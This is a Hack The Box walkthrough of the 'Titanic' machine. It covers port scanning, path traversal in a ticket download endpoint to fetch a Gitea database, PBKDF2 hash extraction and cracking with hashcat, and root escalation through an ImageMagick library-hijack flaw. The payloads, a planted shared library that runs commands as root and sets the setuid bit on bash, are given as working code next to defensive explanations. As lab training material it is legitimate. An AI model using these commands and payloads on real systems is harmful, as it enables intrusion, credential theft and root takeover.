Titanic (HTB)

Let's ride the Titanic but survive this time.

Enumeration.

Port Scanning.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg=
|   256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 79E1E0A79A613646F473CFEDA9E231F1
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/3.0.3 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerate Web.

Once we open the website we see a few links and a booking form.

When we submit the form, a JSON file containing the ticket details is downloaded to our machine.

Enumerate directories.

Using dirsearch we can find a few paths worth testing.

We see /book, which is clearly tied to the booking form, and /download, which answers with 400 (bad request). Let's look at it in Burp Suite.

It takes a ticket name as a GET parameter (ticket=...), i.e. the file the booking flow handed us is fetched back by name.

Interesting: a simple LFI (the ticket parameter is joined onto a directory without any traversal check, so ../ sequences walk out of it). We can read /etc/passwd and see a user called developer.
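The bug class behind this, as an added example (not the box's application code, which is not shown on the page): a Flask/Werkzeug-style download handler that joins the ticket name onto a base directory, beside the hardened check. TICKETS_DIR is a hypothetical base directory; posixpath is used so the demo is deterministic and does not touch the filesystem.

```python
import posixpath
from typing import Optional

# Hypothetical location of the booking app's ticket files; the real directory
# is not shown on the page and only matters as the intended base.
TICKETS_DIR = "/opt/app/tickets"


def vulnerable_ticket_path(ticket: str, base: str = TICKETS_DIR) -> str:
    """The broken pattern behind a traversal like this one: join the untrusted
    ticket name onto the base and hand the result to the file-serving helper.
    '..' segments walk out of base, and an absolute name drops base entirely
    (posixpath.join semantics)."""
    return posixpath.normpath(posixpath.join(base, ticket))


def safe_ticket_path(ticket: str, base: str = TICKETS_DIR) -> Optional[str]:
    """Hardened form: build the same candidate, then insist it is strictly
    inside base.  commonpath (not a string-prefix test) keeps
    /opt/app/tickets2/x from passing as a child of /opt/app/tickets.
    Returns None for anything that must be refused."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, ticket))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/passwd"
    print(vulnerable_ticket_path(traversal))    # /etc/passwd
    print(safe_ticket_path(traversal))          # None
    print(safe_ticket_path("ticket-1234.json"))  # /opt/app/tickets/ticket-1234.json
```

On a live server resolve with os.path.realpath as well, so a symlink inside the tickets directory cannot point back out; Werkzeug ships werkzeug.security.safe_join, which returns None for exactly the inputs rejected above.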

SSH as developer.

Gitea.

After finding the user and the LFI I looked for configuration files and SSH keys through it, with no luck; then with ffuf I found this.

Gitea is an open-source, self-hosted Git service that's similar to GitHub. It allows developers to manage their Git repositories on their own servers, offering features like issue tracking, pull requests, and project management in a lightweight and easy-to-set-up package.

After a bit of searching I found that Gitea keeps its SQLite database under its data directory; here that is gitea/data/gitea/gitea.db inside developer's home. Let's use curl to pull it through the LFI:

curl http://titanic.htb/download\?ticket\="../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output sql

Once we have it we can open it with sqlite3 and look at the user table (passwd, salt and name columns).

Now let's try to crack these.

After a bit of searching I came across this write-up,

which explains how to crack Gitea passwords. By default Gitea stores them as PBKDF2-HMAC-SHA256 with 50000 iterations and a 50-byte key (the passwd_hash_algo column records the scheme for each user, so check it before converting a row), which hashcat handles as mode 10900.

sqlite3 <Your SQL NAME> "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes

This turns each row into the format hashcat understands (user:sha256:rounds:base64(salt):base64(digest), which is why --user is needed below), and then we crack them with hashcat (add -m 10900 if autodetection does not pick PBKDF2-HMAC-SHA256):

hashcat gitea.hashes ../../Downloads/rockyou.txt --user
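The same conversion done in Python, as an added example (not the write-up's pipeline and not Gitea's code): it recomputes a Gitea digest with hashlib, emits the -m 10900 line, and then parses that line back and tests candidates the way hashcat does, so you can confirm the format before a long run. Iteration count and key length follow Gitea's default pbkdf2$50000$50, and the salt is assumed to be in Gitea's hex form (which Gitea decodes to raw bytes before hashing, hence xxd -r -p above). The sample row is constructed; nothing from the box's database is used.

```python
import base64
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Gitea's default scheme, recorded per user in user.passwd_hash_algo as
# "pbkdf2$50000$50": PBKDF2-HMAC-SHA256, 50000 rounds, 50-byte derived key.
ITERATIONS = 50000
KEY_LEN = 50


def gitea_pbkdf2(password: str, salt_hex: str) -> str:
    """Recompute the hex digest Gitea stores in user.passwd from a password
    and the hex salt stored in user.salt."""
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS, dklen=KEY_LEN
    )
    return dk.hex()


def to_hashcat(name: str, passwd_hex: str, salt_hex: str) -> str:
    """hashcat -m 10900 line with a username prefix (hence --user):
    user:sha256:rounds:base64(salt):base64(digest)."""
    def b64(h: str) -> str:
        return base64.b64encode(bytes.fromhex(h)).decode()
    return f"{name}:sha256:{ITERATIONS}:{b64(salt_hex)}:{b64(passwd_hex)}"


def verify(password: str, passwd_hex: str, salt_hex: str) -> bool:
    """Constant-time check of one candidate against a stored row."""
    return hmac.compare_digest(gitea_pbkdf2(password, salt_hex), passwd_hex)


def crack_line(line: str, candidates: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Miniature of what hashcat does with the line: parse it back (rounds and
    key length come from the line itself) and try each candidate.
    Returns (user, password) on a hit, None otherwise."""
    user, algo, rounds, salt_b64, digest_b64 = line.split(":")
    if algo != "sha256":
        raise ValueError("not a PBKDF2-HMAC-SHA256 line")
    salt = base64.b64decode(salt_b64)
    digest = base64.b64decode(digest_b64)
    for pw in candidates:
        dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, int(rounds), dklen=len(digest))
        if hmac.compare_digest(dk, digest):
            return user, pw
    return None


# Constructed sample row (not from the box): a made-up 16-byte hex salt and
# the digest of the made-up password "Winter2024!".
SAMPLE_USER = "developer"
SAMPLE_SALT_HEX = "0f1e2d3c4b5a69788796a5b4c3d2e1f0"
SAMPLE_PASSWORD = "Winter2024!"
SAMPLE_PASSWD_HEX = gitea_pbkdf2(SAMPLE_PASSWORD, SAMPLE_SALT_HEX)

if __name__ == "__main__":
    line = to_hashcat(SAMPLE_USER, SAMPLE_PASSWD_HEX, SAMPLE_SALT_HEX)
    print(line)
    print(crack_line(line, ["letmein", "password", SAMPLE_PASSWORD]))
```

A 50-byte digest base64-encodes to 68 characters and a 16-byte salt to 24, so the default line wrapping of the base64 tool in the shell pipeline never splits a field; if a row's salt is the 10-character legacy form, it is used as raw bytes instead of being hex-decoded.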

After a while we get a result.

Cool, now we have valid creds; let's SSH in as developer.

Shell as Root.

As for the root shell, once on the machine there are a lot of things to look at.

1. Enumerate the docker-compose files.

I enumerated the docker-compose files; one of them was interesting because it exposes SSH on port 2222. I tried planting an SSH key under /data but had no luck.

2. Check the website running on port 3000.

I also enumerated the Gitea instance running on port 3000, but there was nothing there apart from some commits about the booking system.

3. Look around the filesystem.

Finally something interesting: while checking files around the system I came across a script under /opt/scripts.

It contains this bash script:

cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

At first glance this script seems fine, but if we check the version of the magick binary it runs we find out more about it.

A bit of googling turns up the advisory.

The issue is in how this ImageMagick build (the AppImage) sets up its own environment: it exports MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH with an empty entry, and the dynamic loader treats an empty LD_LIBRARY_PATH entry as the current working directory. Since the script cd's into the images directory before running magick, a shared library planted there under a name magick links against (libxcb.so.1) gets loaded, and its code runs with whatever privileges magick was started with, here root (CVE-2024-41817).
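To see exactly why the empty entry matters, here is an added example (not from the page or from ImageMagick) that expands LD_LIBRARY_PATH the way glibc's ld.so documents it and resolves a library name in loader order. IMAGES_DIR is the directory the script above cd's into; APPIMAGE_LIB is a hypothetical AppImage library directory, and DEMO_FILES is a constructed picture of the filesystem, so nothing here reads the real disk unless you drop the exists= override.

```python
import os
from typing import Callable, List, Optional, Sequence

# Directory the /opt/scripts job cd's into before running magick (from the
# page).  The AppImage library directory is hypothetical: the real mount path
# is not on the page.
IMAGES_DIR = "/opt/app/static/assets/images"
APPIMAGE_LIB = "/mnt/appimage/usr/lib"

# Constructed picture of the filesystem for the demo: the genuine libxcb in
# /usr/lib and an attacker-planted copy in the images directory.
DEMO_FILES = {
    "/usr/lib/libxcb.so.1",
    IMAGES_DIR + "/libxcb.so.1",
}


def ld_library_path_dirs(value: Optional[str], cwd: str) -> List[str]:
    """Expand LD_LIBRARY_PATH as glibc's ld.so does: entries are separated by
    ':' (';' is accepted too), and a zero-length entry (leading or trailing
    separator, or two in a row) means the current working directory.  An
    unset or completely empty variable contributes nothing."""
    if not value:
        return []
    return [cwd if entry == "" else entry for entry in value.replace(";", ":").split(":")]


def resolve_library(
    name: str,
    ld_library_path: Optional[str],
    cwd: str,
    exists: Callable[[str], bool] = os.path.isfile,
    system_dirs: Sequence[str] = ("/lib", "/usr/lib"),
) -> Optional[str]:
    """First match in loader order: LD_LIBRARY_PATH entries, then the default
    system directories.  DT_RPATH/RUNPATH and ld.so.cache are deliberately
    left out; they do not change the point about the empty entry."""
    for d in ld_library_path_dirs(ld_library_path, cwd) + list(system_dirs):
        path = os.path.join(d, name)
        if exists(path):
            return path
    return None


def hijackable_dirs(
    ld_library_path: Optional[str], cwd: str, writable: Callable[[str], bool]
) -> List[str]:
    """Search-order directories a low-privileged user can write to.  Any
    library the binary imports can be planted in these."""
    return [d for d in ld_library_path_dirs(ld_library_path, cwd) if writable(d)]


if __name__ == "__main__":
    in_demo = lambda p: p in DEMO_FILES
    # An empty entry (here a trailing ':') puts cwd in the search order.
    print(resolve_library("libxcb.so.1", APPIMAGE_LIB + ":", IMAGES_DIR, exists=in_demo))
    # The same variable without the empty entry: the real library wins.
    print(resolve_library("libxcb.so.1", APPIMAGE_LIB, IMAGES_DIR, exists=in_demo))
    print(hijackable_dirs(APPIMAGE_LIB + ":", IMAGES_DIR, writable=lambda d: d == IMAGES_DIR))
```

The fix on the ImageMagick side is simply to never emit the empty entry; on the job side, not cd'ing into a directory that unprivileged users can write to before running a root binary would have broken the chain just as well.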

Compile this simple payload inside the images directory the script searches, naming it libxcb.so.1 so the loader picks it up from the working directory:

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs as soon as the loader maps this library into magick, before main(). */
__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/rootflag");
    exit(0);
}
EOF

Now make a change in that directory so the script runs again, for example:

cp home.jpg home2.jpg

Then check /tmp for your flag.

Additional info.

Out of curiosity I wanted an actual root shell, not just the flag. That is easy: we need a way to get a shell running as root.

We can set the setuid bit on the bash binary, so that whoever executes it gets the owner's (root's) effective uid.

Here is the updated payload:

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* 4755 would do; 4777 additionally leaves bash world-writable. */
__attribute__((constructor)) void init(){
    system("chmod 4777 /usr/bin/bash");
    exit(0);
}
EOF

But be careful: if you just run the setuid bash as it is, it will not give you a root shell.

As we can see we are still not root. This is bash itself, not the kernel: when bash starts with an effective uid different from the real uid it resets the effective uid back to the real one unless it is started in privileged mode. Run /usr/bin/bash -p and the euid stays 0.
